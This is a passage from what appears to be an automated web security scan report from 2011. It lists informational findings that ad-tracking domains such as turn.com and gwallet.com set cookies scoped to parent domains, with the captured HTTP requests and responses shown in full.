Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Set-Cookie: pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAtEibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1uuItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNzv-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 15:39:03 GMT

GIF89a.............!.......,...........D..;

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xaxbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15153%7C15153%7C15156%7C15151%7C15153%7C15153%7C15156%7C15146%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15156%7C15153%7C15153%7C15149%7C15153%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15153; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
Content-Length: 0
Date: Wed, 06 Jul 2011 11:21:55 GMT

9.41. http://rs.gwallet.com/r1/pixel/x1094 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x1094

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=553&_radium=0
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

9.42. http://rs.gwallet.com/r1/pixel/x1225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x1225

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://bstats.adbrite.com/adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

9.43. http://rs.gwallet.com/r1/pixel/x368 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x368

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
